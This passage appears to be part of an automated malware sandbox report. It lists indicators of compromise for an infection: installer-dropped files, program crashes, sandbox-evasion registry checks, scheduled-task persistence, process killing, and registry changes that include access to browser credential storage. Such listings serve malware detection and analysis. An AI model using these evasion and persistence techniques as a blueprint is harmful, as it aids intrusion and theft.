(x86)\MSBuild\Mugukadigy.exe.config cmd.exe -
Drops file in Windows directory 42 IoCs
Processes:
msiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exedescription ioc process File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSIA4DB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB55A.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\f7af604.msi msiexec.exe File created C:\Windows\Installer\f7af601.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF9CA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9F0A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI132.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA297.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\f7af601.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIFF2C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI85.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIB984.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIB80B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBABF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB141.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB8F7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFD93.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFE9E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA18C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB73F.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSIFFB9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA053.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIB430.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSIA49B.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3332 1108 WerFault.exe Tue0190442925.exe 2696 1108 WerFault.exe Tue0190442925.exe 2372 1108 WerFault.exe Tue0190442925.exe 4508 1108 WerFault.exe Tue0190442925.exe 2188 3844 WerFault.exe run.exe 6008 1108 WerFault.exe Tue0190442925.exe 2596 1108 WerFault.exe Tue0190442925.exe 6028 5876 WerFault.exe 8071603.exe 5228 1108 WerFault.exe Tue0190442925.exe 2932 2688 WerFault.exe 5.exe 2284 8336 WerFault.exe DA65.exe -
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
MZGnU5fdSxCORNKj98rM7R3_.exeB16D.exeD35F.exetY9mbnr7DlvhFnRuAJK8dDk1.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MZGnU5fdSxCORNKj98rM7R3_.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MZGnU5fdSxCORNKj98rM7R3_.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B16D.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D35F.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MZGnU5fdSxCORNKj98rM7R3_.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tY9mbnr7DlvhFnRuAJK8dDk1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tY9mbnr7DlvhFnRuAJK8dDk1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tY9mbnr7DlvhFnRuAJK8dDk1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D35F.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B16D.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B16D.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D35F.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exeJm8HLB0eQU3BTdk5zhJMuwPW.exeEFB3.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jm8HLB0eQU3BTdk5zhJMuwPW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Jm8HLB0eQU3BTdk5zhJMuwPW.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 EFB3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EFB3.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 6476 schtasks.exe 6468 schtasks.exe 4612 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 6240 timeout.exe 6836 timeout.exe -
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1292 taskkill.exe 5316 taskkill.exe 6516 taskkill.exe 7488 taskkill.exe 7756 taskkill.exe 5800 taskkill.exe 6192 taskkill.exe 6232 taskkill.exe 3504 taskkill.exe 7472 taskkill.exe -
Processes:
browser_broker.exeMicrosoftEdgeCP.exeservicesdfjdgba.exewscript.exeMicrosoftEdge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main servicesdfjdgba.exe Key created \Registry\User\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 wscript.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe -
Modifies data under HKEY_USERS 19 IoCs
Processes:
svchost.exemsiexec.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exemsiexec.exeMicrosoftEdgeCP.exesvchost.exeExplorer.EXEMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exerundll32.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 991006254acad701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\MrtCache MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 531fc8ab4acad701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{D6F73043-B94D-486F-93F8-804C26D3A9AD} = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 243e47154bcad701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e9b7b7a64acad701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Pack = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24}\1 = "6144" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TKR9TRJ3-XT3I-VY52-597M-MXZ27DTVMS64} rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000003ab82e3614de37ef0099bba337e502b31a8ba55b6bf5838789a2055765d7d9613985713dcb96be3fff0dd5a21aa5bd8595ea8f9b95f6b433673eab57fe23f8787d3f8d3a8388bbda55d85e07c1663de30347c05008013d4b29bf3f8739c12b3f1006f3c68853b4041d1747e0afc8c213b6c03b54a1b4b834e044d4d3235082805afa33b1b5971caaa4ebaeacd76bd0e93e77d36a09b142e9c1ef2b87ac6ff5cc633b591ad3f406179774d271c9ef6230f58aa8023496b5b043dfe40937c045205de9735ba80aa73c03d3f57841f5a9230f1b1bc69f0496721534cef72ae23fb0432455be2f7939883e2698380a1be6fb9748a8f9419c8594000ee284c3742db77a0ced0755e19c49c48ec7ec030224882e3330af93fc3466e78c9d321c18535bacc115ce54e2c5a86b2cdc54fc4a48d98bfa70c462c63822f1d0aed3706dce9db56314a3181c7e2f271e6523a69342fa0dbf42b42d98ac7c2af9d9dfc812365fb412360b422f29dad18566b6947d17bd93a05037841354c05227fa1811a93772e9ee4b4780ba94c587819f286aa963957cbf2ab459d8fd7c9a0b15312ee3afcbc6521cbbba7a173b MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e36df5884acad701 MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Key created 